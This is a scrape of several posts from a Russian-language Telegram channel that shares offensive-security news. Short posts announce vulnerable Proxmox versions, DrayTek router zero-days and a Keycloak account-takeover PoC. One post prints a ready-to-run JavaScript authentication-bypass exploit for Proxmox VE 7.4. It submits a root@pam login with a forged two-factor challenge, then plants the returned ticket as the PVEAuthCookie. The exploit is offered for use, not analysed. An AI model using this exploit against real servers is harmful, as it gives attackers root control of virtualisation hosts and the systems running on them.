P Proxy Bar 01.09.2026 18:50 · 👁 5.9K Подъехала инфа что в версии 8.0.3 / 8.2 proxmox тоже есть bypass 8.4 и 9.2 пока (!) считаются безопасными
P Proxy Bar 01.09.2026 15:30 · 👁 6.2K Proxmox VE * PVE 7.4 auth-bypass exploit // PVE 7.4 auth-bypass @NebuSec 2026 // First, make sure to try logging in as root with this exact password: root@pam (async () => { const form = new URLSearchParams({ username: "root@pam", password: "root@pam", "tfa-challenge": "NEBUSEC-CHALLENGE", }); const loginResponse = await fetch("/api2/json/access/ticket", { method: "POST", credentials: "omit", headers: { "Content-Type": "application/x-www-form-urlencoded;charset=UTF-8" }, body: form, }); const loginBody = await loginResponse.json(); document.cookie = `PVEAuthCookie=${loginBody?.data?.ticket}; Path=/; Secure; SameSite=Strict`; location.reload() })();
P Proxy Bar 26.08.2026 13:14 · 👁 6.2K Two Zero-Days in the DrayTek Vigor2962 Router * read Рубрика нас просят (пора с этим завязывать)
P Proxy Bar 25.08.2026 15:34 · 👁 6.4K CVE-2026-18963 KeyCloak * reset-credentials bypass → unauthenticated account takeover PoCexploit